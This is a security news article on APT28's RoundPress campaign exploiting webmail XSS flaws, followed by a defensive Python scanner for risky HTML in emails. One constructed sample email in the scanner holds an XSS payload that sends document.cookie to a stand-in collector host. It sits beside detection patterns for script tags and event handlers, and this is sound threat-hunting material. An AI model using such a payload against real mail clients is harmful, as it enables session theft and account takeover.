Email security, Threat Intelligence
Global government webmail servers targeted by Russian cyberespionage operation

Russian state-sponsored threat group APT28 has exploited vulnerabilities in webmail servers to target government organizations, defense firms, military units, and critical infrastructure entities in several countries, including Ukraine, Bulgaria, and Ecuador, as part of the RoundPress cyberespionage campaign, BleepingComputer reports.
APT28, also known as Fancy Bear or Sednit, sent spear-phishing emails themed around news or political events whose HTML bodies carried JavaScript that exploits cross-site scripting (XSS) vulnerabilities in several webmail products, according to an analysis from ESET. Because the injected script runs in the victim's browser when the message is rendered, viewing the email in a vulnerable webmail client is enough to trigger it. Exploitation of the Roundcube stored XSS flaw tracked as CVE-2020-35730 allowed APT28 to steal credentials and other mailbox data, while a zero-day XSS in MDaemon, tracked as CVE-2024-11182, additionally let the group bypass two-factor authentication and maintain persistent access on top of credential theft. APT28 has also abused other flaws in Roundcube, Horde, and Zimbra webmail servers to inject malicious code that executes when a message is viewed, ESET researchers said.
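For defenders who want to hunt for this class of delivery in their own mail stores, the following is an added triage example written for this page; it is not code from ESET, SC Media, or the RoundPress campaign, and the two sample messages embedded in it are constructed, not real APT28 emails. It parses raw RFC 5322 messages, pulls out every text/html part, and flags the constructs a webmail XSS payload would rely on (script elements, on* event handlers, javascript: URLs, srcdoc attributes). The indicator names and the collector URL in the sample are assumptions for illustration.

```python
"""Triage scanner for active content in HTML e-mail bodies.

Added example, not part of the article or the campaign it describes.
A hit is not proof of compromise; it marks a message for manual review
in a webmail client that may not sanitize HTML correctly.
"""
import email
import html
import re
from email import policy
from email.message import EmailMessage
from typing import Dict, List

# Patterns deliberately favour recall over precision: an analyst
# reviews the hits, so a false positive costs little.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"""\son[a-z]+\s*=\s*["']?""", re.I),
    "javascript_url": re.compile(
        r"""(?:href|src|action)\s*=\s*["']?\s*javascript:""", re.I),
    "srcdoc": re.compile(r"\ssrcdoc\s*=", re.I),
}

# Constructed sample: a plain HTML notice with an ordinary https link.
BENIGN_EML = b"""From: a@example.test
To: b@example.test
Subject: Minutes
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Minutes attached.</p><a href="https://example.test/m">link</a></body></html>
"""

# Constructed sample: news-themed lure whose HTML part carries an
# event handler and a javascript: link (hypothetical collector host).
SUSPICIOUS_EML = b"""From: news@example.test
To: b@example.test
Subject: Breaking news
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Read the full story online.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Read the full story</p>
<img src="x" onerror="fetch('https://collector.example.test/?c='+document.cookie)">
<a href="javascript:void(0)">more</a></body></html>
--b1--
"""


def html_parts(msg: EmailMessage) -> List[str]:
    """Return the decoded body of every text/html part, nested or not."""
    return [part.get_content() for part in msg.walk()
            if part.get_content_type() == "text/html"]


def scan_raw_message(raw: bytes) -> Dict[str, List[str]]:
    """Parse one raw message; return {indicator: [matched snippets]}."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits: Dict[str, List[str]] = {}
    for body in html_parts(msg):
        # Decode entities first so e.g. &#106;avascript: is seen as javascript:
        text = html.unescape(body)
        for name, pattern in INDICATORS.items():
            for m in pattern.finditer(text):
                snippet = text[m.start(): m.start() + 60].replace("\n", " ")
                hits.setdefault(name, []).append(snippet)
    return hits


def flagged(messages: List[bytes]) -> List[int]:
    """Indices of messages that produced at least one indicator hit."""
    return [i for i, raw in enumerate(messages) if scan_raw_message(raw)]


if __name__ == "__main__":
    for idx in flagged([BENIGN_EML, SUSPICIOUS_EML]):
        print(idx, scan_raw_message([BENIGN_EML, SUSPICIOUS_EML][idx]))
```

Run it over exported .eml files from the affected mailboxes rather than trusting the webmail client's own rendering: the point of the campaign is that the client is the component that fails to sanitize. Entity decoding catches the simplest obfuscation, but attribute splitting, unusual encodings, or CSS-based tricks will slip past a regex scanner, so treat a clean result as "nothing obvious", not as a clean bill of health.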